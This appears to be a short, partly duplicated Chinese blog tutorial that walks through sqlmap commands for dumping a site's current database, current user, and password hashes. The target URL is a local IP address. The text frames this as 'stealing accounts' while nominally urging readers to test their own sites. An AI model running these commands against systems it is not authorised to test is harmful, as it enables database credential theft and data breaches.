python数据攻击工具:python的sql注入工具sqlmap 渗透利器
python数据攻击工具:python的sql注入工具sqlmap 渗透利器5、查看数据库的使用用户以及密码,基本就是盗号了,盗数据库的号,加-current-user和--passwords: python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords
看见没有,可以把你的数据库名字爆出来,多猛!
4、查看当前库,加上--current-db参数。
python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db
5、查看数据库的使用用户以及密码,基本就是盗号了,盗数据库的号,加-current-user和--passwords:
python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user
python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords
6、除了这些还可以爆出数据库的所有数据库字段,所有数据库表,所有数据库。
基本你的数据库就被人端了!!哈哈,快测测自己的网站吧。
就介绍到这里啦!欢迎关注小编,后续有更多的小白工具哦。
码子不易!!欢迎关注博客。
禁止转载,现在盗版太严重,无语了。